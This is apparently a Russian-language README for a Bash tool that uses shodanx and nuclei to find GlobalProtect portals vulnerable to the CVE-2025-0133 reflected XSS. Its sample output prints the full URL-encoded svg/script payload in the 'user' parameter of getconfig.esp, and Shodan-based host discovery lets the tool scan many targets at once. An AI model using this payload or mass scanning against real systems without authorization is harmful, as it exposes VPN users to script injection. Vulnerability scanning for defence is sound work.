
Обнаружена уязвимость Reflected XSS в Palo Alto GlobalProtect Gateway & Portal. Злоумышленники могут внедрять вредоносные скрипты через специально созданные запросы.
Автоматизированный инструмент сканирования на Bash для обнаружения уязвимости CVE-2025-0133 (Reflected XSS) в Palo Alto GlobalProtect Gateway & Portal с использованием nuclei и shodanx.
Автор:
Дата: 23.06.2025
Серьёзность: Средняя
ID CVE: CVE-2025-0133
Тип уязвимости: Отражённый межсайтовый скриптинг (XSS)
Протестировано на: Palo Alto Networks GlobalProtect Portal (PAN-OS)
Этот инструмент помогает пентестерам и исследователям безопасности быстро выявлять уязвимые домены или IP-адреса, связанные с CVE-2025-0133.
В нём используются шаблоны nuclei и интеграция с Shodan (shodanx) для эффективного поиска и сканирования целей.
shodanx для отдельных доменов, чтобы собрать связанные хостыnuclei с пользовательским шаблоном CVE-2025-0133 для сканирования целей.txt и .json$PATHCVE-2025-0133 расположен по пути:/home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml (при необходимости измените путь)pip install git+https://github.com/RevoltSecurities/ShodanX
Если появляется ошибка: "error: externally-managed-environment"
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
⚠️ Примечание: Параметр
--break-system-packagesможет потребоваться в некоторых системах (особенно Debian/Ubuntu), чтобы разрешить pip установку пакетов вне виртуального окружения без ошибок прав доступа.
👉 Убедитесь, что shodanx доступен в $PATH.
Проверьте командой:
shodanx -h
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Проверьте установку:
nuclei -version
Затем обновите шаблоны:
nuclei -update-templates
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h
Использование: ./cve20250133.sh <домен-или-файл>
Сканирование уязвимости CVE-2025-0133 с помощью nuclei и shodanx.
Если ввод — файл, сканировать домены/IP из файла.
Если ввод — домен, запустить shodanx для поиска связанных IP/доменов и просканировать их.
Параметры:
-h, --help, help Показать это сообщение справки и выйти.
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Время начала сканирования: 2025-06-24 16:33:51
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Ввод — один домен: domain.com — сначала запускаем ShodanX
_ _
| | | (_\ /
, | | __ __| __, _ _ \/
/ \_|/ \ / \_/ | / | / |/ | /\
\/ | |_/\__/ \_/|_/\_/|_/ | |_/ _/ \_/
- RevoltSecurities
[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt
Время начала сканирования: 2025-06-24 16:36:37
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Ввод — файл: file.txt — пропускаем ShodanX
[*] Scanning domain 123.45.67.890 ...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
Уязвимость отражённого межсайтового скриптинга (XSS) в Palo Alto GlobalProtect Gateway & Portal, позволяющая злоумышленникам внедрять вредоносные скрипты через специально сформированные запросы. Для устранения этой проблемы обновите свои системы до последних версий Palo Alto Networks.
Этот проект лицензирован на условиях лицензии MIT — подробнее см. в файле LICENSE.